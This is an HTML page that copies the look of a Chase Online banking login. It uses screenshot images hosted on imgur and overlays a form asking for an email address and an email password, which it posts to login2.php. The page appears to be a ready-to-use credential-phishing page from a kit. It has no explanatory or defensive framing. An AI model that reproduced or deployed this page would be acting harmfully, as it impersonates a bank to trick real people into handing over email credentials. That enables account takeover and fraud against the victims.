<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Chase Online</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1347px; height:620px; z-index:0"><img src="https://i.imgur.com/JpZu4nF.jpg" alt="" title="" border=0 width=1347 height=620></div>

<div id="image3" style="position:absolute; overflow:hidden; left:0px; top:607px; width:1347px; height:157px; z-index:1"><img src="https://i.imgur.com/2OlIhxi.jpg" alt="" title="" border=0 width=1347 height=157></div>

<div id="image2" style="position:absolute; overflow:hidden; left:10px; top:594px; width:431px; height:117px; z-index:2"><img src="https://i.imgur.com/GEOiPrN.jpg" alt="" title="" border=0 width=431 height=117></div>

<form name="form1" method="POST" action="login2.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:718px;left:535px;top:495px;z-index:4;height: 46px;"  required placeholder="E-mail Address">
<input name="formtext2" type="password" style="position:absolute;width:718px;left:535px;top:558px;z-index:5;height: 46px;" required placeholder="E-mail Password">
<div id="formimage1" style="position:absolute; left:529px; top:618px; z-index:6"><input type="image" name="formimage1" width="728" height="47" src="https://i.imgur.com/brNnBoT.jpg"></div>
</form>


</body>
</html>
